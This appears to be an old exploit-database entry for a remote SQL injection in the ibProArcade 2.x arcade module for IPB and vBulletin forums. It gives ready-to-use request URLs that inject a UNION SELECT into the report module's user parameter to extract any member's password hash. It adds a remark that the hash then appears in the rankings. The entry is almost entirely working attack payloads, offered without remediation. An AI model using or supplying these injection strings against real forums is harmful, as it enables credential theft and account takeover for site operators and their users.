ibProArcade 2.x module (vBulletin-IPB) Remote SQL Injection Exploit
2005-11-06 00:00:00# Rankings for (name) will state the md5 hash for the user /str0ke
# ibProArcade 2.x
IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]
vBulettin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]
Author: B~HFH
Email: [email protected]
#
Fixes
No fixesIn order to submit a new fix you need to be registered.

